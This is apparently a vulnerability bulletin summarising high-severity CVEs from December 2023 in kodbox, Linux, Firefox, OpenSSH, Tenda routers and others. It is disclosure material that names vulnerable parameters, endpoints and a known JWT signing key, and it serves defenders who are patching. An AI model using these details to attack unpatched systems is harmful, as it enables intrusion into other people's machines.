kodcloud — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been declared as critical. Affected by this vulnerability is the function check of the file plugins/officeViewer/controller/libreOffice/index.class.php. The manipulation of the argument soffice leads to command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The identifier of the patch is 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. The identifier VDB-248209 was assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6848
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodbox A vulnerability was found in kalcaddle kodbox up to 1.48. It has been rated as critical. Affected by this issue is the function cover of the file plugins/fileThumb/app.php. The manipulation of the argument path leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.48.04 is able to address this issue. The patch is identified as 63a4d5708d210f119c24afd941d01a943e25334c. It is recommended to upgrade the affected component. VDB-248210 is the identifier assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6849
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been declared as critical. This vulnerability affects unknown code of the file /index.php?pluginApp/to/yzOffice/getFile of the component API Endpoint Handler. The manipulation of the argument path/file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is identified as 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. VDB-248218 is the identifier assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6850
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability was found in kalcaddle KodExplorer up to 4.51.03. It has been rated as critical. This issue affects the function unzipList of the file plugins/zipView/app.php of the component ZIP Archive Handler. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The patch is named 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248219. 2023-12-16 9.8 CVE-2023-6851
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability classified as critical has been found in kalcaddle KodExplorer up to 4.51.03. Affected is an unknown function of the file plugins/webodf/app.php. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The name of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248220. 2023-12-16 9.8 CVE-2023-6852
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kodcloud — kodexplorer A vulnerability classified as critical was found in kalcaddle KodExplorer up to 4.51.03. Affected by this vulnerability is the function index of the file plugins/officeLive/app.php. The manipulation of the argument path leads to server-side request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.52.01 is able to address this issue. The identifier of the patch is 5cf233f7556b442100cf67b5e92d57ceabb126c6. It is recommended to upgrade the affected component. The identifier VDB-248221 was assigned to this vulnerability. 2023-12-16 9.8 CVE-2023-6853
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
kylinsoft — hedron-domain-hook A vulnerability was found in KylinSoft hedron-domain-hook up to 3.8.0.12-0k0.5. It has been declared as critical. This vulnerability affects the function init_kcm of the component DBus Handler. The manipulation leads to improper access controls. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. VDB-248578 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-21 7.8 CVE-2023-7025
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
lfprojects — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-15 8.1 CVE-2023-6831
security@huntr.dev
security@huntr.dev
linux — kernel A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system. 2023-12-21 7.8 CVE-2023-6546
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
linux — kernel A heap out-of-bounds write vulnerability in the Linux kernel’s Performance Events system component can be exploited to achieve local privilege escalation. A perf_event’s read_size can overflow, leading to a heap out-of-bounds increment or write in perf_read_group(). We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b. 2023-12-19 7.8 CVE-2023-6931
cve-coordination@google.com
cve-coordination@google.com
linux — kernel A use-after-free vulnerability in the Linux kernel’s ipv4: igmp component can be exploited to achieve local privilege escalation. A race condition can be exploited to cause a timer to be mistakenly registered on an RCU read locked object which is freed by another thread. We recommend upgrading past commit e2b706c691905fe78468c361aaabc719d0a496f1. 2023-12-19 7.8 CVE-2023-6932
cve-coordination@google.com
cve-coordination@google.com
linux — linux_kernel A use-after-free vulnerability in the Linux kernel’s netfilter: nf_tables component can be exploited to achieve local privilege escalation. The function nft_pipapo_walk did not skip inactive elements during set walk which could lead to double deactivations of PIPAPO (Pile Packet Policies) elements, leading to use-after-free. We recommend upgrading past commit 317eb9685095678f2c9f5a8189de698c5354316a. 2023-12-18 7.8 CVE-2023-6817
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
cve-coordination@google.com
m-files_corporation — m-files_server Lack of protection against brute force attacks in M-Files Server before 23.12.13205.0 allows an attacker unlimited authentication attempts, potentially compromising targeted M-Files user accounts by guessing passwords. 2023-12-20 7.5 CVE-2023-6912
security@m-files.com
majordomo — majordomo MajorDoMo (aka Major Domestic Module) before 0662e5e allows command execution via thumb.php shell metacharacters. NOTE: this is unrelated to the Majordomo mailing-list manager. 2023-12-15 9.8 CVE-2023-50917
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
master_slider — master_slider_pro Deserialization of Untrusted Data vulnerability in Master Slider Master Slider Pro. This issue affects Master Slider Pro: from n/a through 3.6.5. 2023-12-20 7.1 CVE-2023-47507
audit@patchstack.com
mindsdb — mindsdb MindsDB is a SQL Server for artificial intelligence. Prior to version 23.11.4.1, the `put` method in `mindsdb/mindsdb/api/http/namespaces/file.py` does not validate the user-controlled name value, which is used in a temporary file name, which is afterwards opened for writing on lines 122-125, which leads to path injection. Later in the method, the temporary directory is deleted on line 151, but since we can write outside of the directory using the path injection vulnerability, the potentially dangerous file is not deleted. Arbitrary file contents can be written due to `f.write(chunk)` on line 125. Mindsdb does check later on line 149 in the `save_file` method in `file-controller.py` which calls the `_handle_source` method in `file_handler.py` if a file is of one of the types `csv`, `json`, `parquet`, `xls`, or `xlsx`. However, since the check happens after the file has already been written, the files will still exist (and will not be removed due to the path injection described earlier), just the `_handle_source` method will return an error. The same user-controlled source is used also in another path injection sink on line 138. This leads to another path injection, which allows an attacker to delete any `zip` or `tar.gz` files on the server. 2023-12-22 9.1 CVE-2023-50731
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
misp — misp app/Controller/AuditLogsController.php in MISP before 2.4.182 mishandles ACLs for audit logs. 2023-12-15 9.8 CVE-2023-50918
cve@mitre.org
cve@mitre.org
mlflow — mlflow Path Traversal: ‘..filename’ in GitHub repository mlflow/mlflow prior to 2.9.2. 2023-12-18 7.5 CVE-2023-6909
security@huntr.dev
security@huntr.dev
moxa — iologik_e1200_series A Cross-Site Request Forgery (CSRF) vulnerability has been identified in ioLogik E1200 Series firmware versions v3.3 and prior. An attacker can exploit this vulnerability to trick a client into making an unintentional request to the web server, which will be treated as an authentic request. This vulnerability may lead an attacker to perform operations on behalf of the victimized user. 2023-12-23 8.8 CVE-2023-5961
psirt@moxa.com
mozilla — firefox TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed. This vulnerability affects Firefox < 121. 2023-12-19 8.8 CVE-2023-6866
security@mozilla.org
security@mozilla.org
mozilla — firefox Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 121. 2023-12-19 8.8 CVE-2023-6873
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — firefox_esr/thunderbird A use-after-free was identified in the `nsDNSService::Init`. This issue appears to manifest rarely during start-up. This vulnerability affects Firefox ESR < 115.6 and Thunderbird < 115.6. 2023-12-19 8.8 CVE-2023-6862
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6856
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6858
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products A use-after-free condition affected TLS socket creation when under memory pressure. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6859
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6861
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6863
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mozilla — multiple_products Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox ESR < 115.6, Thunderbird < 115.6, and Firefox < 121. 2023-12-19 8.8 CVE-2023-6864
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
security@mozilla.org
mr-corner — amazing_little_poll Authentication bypass vulnerability in Amazing Little Poll affecting versions 1.3 and 1.4. This vulnerability could allow an unauthenticated user to access the admin panel without providing any credentials by simply accessing the “lp_admin.php?adminstep=” parameter. 2023-12-20 9.8 CVE-2023-6768
cve-coordination@incibe.es
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a vulnerability of using hard-coded credentials. A remote attacker can exploit this vulnerability to access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48388
twcert@cert.org.tw
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a code injection vulnerability. An unauthenticated remote attacker can exploit this vulnerability to inject code and access the system to perform arbitrary system operations or disrupt service. 2023-12-15 9.8 CVE-2023-48390
twcert@cert.org.tw
multisuns — easylog_web+_firmware Multisuns EasyLog web+ has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48389
twcert@cert.org.tw
navidrome — navidrome Navidrome is an open source web-based music collection server and streamer. A security vulnerability has been identified in navidrome’s subsonic endpoint, allowing for authentication bypass. This exploit enables unauthorized access to any known account by utilizing a JSON Web Token (JWT) signed with the key “not so secret”. The vulnerability can only be exploited on instances that have never been restarted. Navidrome supports an extension to the subsonic authentication scheme, where a JWT can be provided using a `jwt` query parameter instead of the traditional password or token and salt (corresponding to resp. the `p` or `t` and `s` query parameters). This authentication bypass vulnerability potentially affects all instances that don’t protect the subsonic endpoint `/rest/`, which is expected to be most instances in a standard deployment, and most instances in the reverse proxy setup too (as the documentation mentions to leave that endpoint unprotected). This issue has been patched in version 0.50.2. 2023-12-21 8.6 CVE-2023-51442
security-advisories@github.com
security-advisories@github.com
netentsec — application_security_gateway A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file /admin/singlelogin.php?submit=1. The manipulation of the argument loginId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248265 was assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6903
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
netgear — wnr2000_firmware A Command Injection vulnerability exists in NETGEAR WNR2000v4 version 1.0.0.70. When using HTTP for SOAP authentication, command execution occurs during the process after successful authentication. 2023-12-15 9.8 CVE-2023-50089
cve@mitre.org
cve@mitre.org
nxfilter — nxfilter A vulnerability, which was classified as problematic, has been found in Jahastech NxFilter 4.3.2.5. This issue affects some unknown processing of the file user,adap.jsp?actionFlag=test&id=1 of the component Bind Request Handler. The manipulation leads to ldap injection. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-248267. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-18 9.8 CVE-2023-6905
cna@vuldb.com
cna@vuldb.com
nxfilter — nxfilter A vulnerability classified as problematic was found in Jahastech NxFilter 4.3.2.5. This vulnerability affects unknown code of the file /config,admin.jsp. The manipulation of the argument admin_name leads to cross-site request forgery. The attack can be initiated remotely. VDB-248266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-17 8.8 CVE-2023-6904
cna@vuldb.com
cna@vuldb.com
octokit — app octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the nodejs process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Protobot 12.3.3. 2023-12-15 7.5 CVE-2023-50728
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
openbsd — openssh In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name. 2023-12-18 9.8 CVE-2023-51385
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
openimageio — openimageio A vulnerability was found in OpenImageIO, where a heap buffer overflow exists in the src/gif.imageio/gifinput.cpp file. This flaw allows a remote attacker to pass a specially crafted file to the application, which triggers a heap-based buffer overflow and could cause a crash, leading to a denial of service. 2023-12-18 7.5 CVE-2023-3430
secalert@redhat.com
nvd@nist.gov
panasonic — control_fpwin_pro Stack-based buffer overflow in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. 2023-12-19 7.8 CVE-2023-6314
product-security@gg.jp.panasonic.com
panasonic — control_fpwin_pro Out-of-bounds read vulnerability in FPWin Pro version 7.7.0.0 and all previous versions may allow attackers to execute arbitrary code via a specially crafted project file. 2023-12-19 7.8 CVE-2023-6315
product-security@gg.jp.panasonic.com
peazip — peazip A vulnerability has been found in PeaZip 9.4.0 and classified as problematic. Affected by this vulnerability is an unknown functionality in the library dragdropfilesdll.dll of the component Library Handler. The manipulation leads to uncontrolled search path. An attack has to be approached locally. Upgrading to version 9.6.0 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248251. NOTE: Vendor was contacted early, confirmed the existence of the flaw and immediately worked on a patched release. 2023-12-17 7.8 CVE-2023-6891
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
perl — perl A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer. 2023-12-18 7 CVE-2023-47038
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
phz76 — rtspserver A vulnerability classified as critical was found in PHZ76 RtspServer 1.0.0. This vulnerability affects the function ParseRequestLine of the file RtspMesaage.cpp. The manipulation leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-17 9.8 CVE-2023-6888
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
projectworlds — online_voting_system_project Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the login_action.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-48433
help@fluidattacks.com
help@fluidattacks.com
projectworlds — online_voting_system_project Online Voting System Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the reg_action.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-48434
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — leave_management_system_project Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setearnleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 8.8 CVE-2023-44481
help@fluidattacks.com
help@fluidattacks.com
projectworlds_pvt._limited — leave_management_system_project Leave Management System Project v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘setsickleave’ parameter of the admin/setleaves.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 8.8 CVE-2023-44482
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘ch’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45115
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘demail’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45116
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘eid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45117
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘fdid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45118
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘n’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45119
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘qid’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45120
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘desc’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45121
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘name’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45122
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘right’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45123
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘tag’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45124
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘time’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45125
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘total’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45126
help@fluidattacks.com
projectworlds_pvt._limited — online_examination_system Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘wrong’ parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-45127
help@fluidattacks.com
projectworlds_pvt._limited — online_matrimonial_project Online Matrimonial Project v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘filename’ attribute of the ‘pic3’ multipart parameter of the functions.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-46791
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘psd’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48685
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘user’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48686
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘from’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48687
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘to’ parameter of the reservation.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48688
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘byname’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48689
help@fluidattacks.com
projectworlds_pvt._limited — railway_reservation_system Railway Reservation System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bynum’ parameter of the train.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48690
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_id’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48716
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_classes.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48717
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48718
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘roll_no’ parameter of the add_students.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48719
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘password’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48720
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘class_name’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48722
help@fluidattacks.com
projectworlds_pvt._limited — student_result_management_system Student Result Management System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘rno’ parameter of the add_results.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-48723
help@fluidattacks.com
redpanda — redpanda Redpanda before 23.1.21 and 23.2.x before 23.2.18 has missing authorization checks in the Transactions API. 2023-12-18 9.8 CVE-2023-50976
cve@mitre.org
rmountjoy92 — dashmachine A vulnerability classified as problematic was found in rmountjoy92 DashMachine 0.5-4. Affected by this vulnerability is an unknown functionality of the file /settings/save_config of the component Config Handler. The manipulation of the argument value_template leads to code injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248257 was assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6899
cna@vuldb.com
rmountjoy92 — dashmachine A vulnerability, which was classified as critical, has been found in rmountjoy92 DashMachine 0.5-4. Affected by this issue is some unknown functionality of the file /settings/delete_file. The manipulation of the argument file leads to path traversal: ‘../filedir’. The exploit has been disclosed to the public and may be used. VDB-248258 is the identifier assigned to this vulnerability. 2023-12-17 9.1 CVE-2023-6900
cna@vuldb.com
shenzen_libituo_technology_co.,_ltd — lbt-t300-t310_firmware Shenzhen Libituo Technology Co., Ltd LBT-T300-T310 v2.2.2.6 was discovered to contain a buffer overflow via the ApCliEncrypType parameter at /apply.cgi. 2023-12-15 9.8 CVE-2023-50469
cve@mitre.org
silabs — gecko_software_development_kit An unvalidated input in a library function responsible for communicating between secure and non-secure memory in Silicon Labs TrustZone implementation allows reading/writing of memory in the secure region of memory from the non-secure region of memory. 2023-12-15 9.1 CVE-2023-4020
product-security@silabs.com
softnext — mail_sqr_expert Softnext Mail SQR Expert is an email management platform. It has insufficient filtering for a special character within a specific function. A remote attacker authenticated as a localhost can exploit this vulnerability to perform command injection attacks to execute arbitrary system commands, manipulate the system, or disrupt service. 2023-12-15 8 CVE-2023-48380
twcert@cert.org.tw
softnext — mail_sqr_expert Softnext Mail SQR Expert has a path traversal vulnerability within its parameter in a specific URL. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48378
twcert@cert.org.tw
solarwinds — access_rights_manager Sensitive data was added to our public-facing knowledgebase that, if exploited, could be used to access components of Access Rights Manager (ARM) if the threat actor is in the same environment. 2023-12-21 7.6 CVE-2023-40058
psirt@solarwinds.com
sourcecodester — best_courier_management_system A vulnerability classified as critical has been found in SourceCodester Best Courier Management System 1.0. Affected is an unknown function of the file manage_user.php. The manipulation of the argument id leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248256. 2023-12-17 9.8 CVE-2023-6898
cna@vuldb.com
starnight — micro_http_server In MicroHttpServer (aka Micro HTTP Server) through 4398570, _ReadStaticFiles in lib/middleware.c allows a stack-based buffer overflow and potentially remote code execution via a long URI. 2023-12-17 9.8 CVE-2023-50965
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the sysScheduleRebootSet function. 2023-12-20 9.8 CVE-2023-50983
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the ip parameter in the spdtstConfigAndStart function. 2023-12-20 9.8 CVE-2023-50984
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the lanGw parameter in the lanCfgSet function. 2023-12-20 9.8 CVE-2023-50985
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysLogin function. 2023-12-20 9.8 CVE-2023-50986
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the time parameter in the sysTimeInfoSet function. 2023-12-20 9.8 CVE-2023-50987
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the bandwidth parameter in the wifiRadioSetIndoor function. 2023-12-20 9.8 CVE-2023-50988
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a command injection vulnerability via the pingSet function. 2023-12-20 9.8 CVE-2023-50989
cve@mitre.org
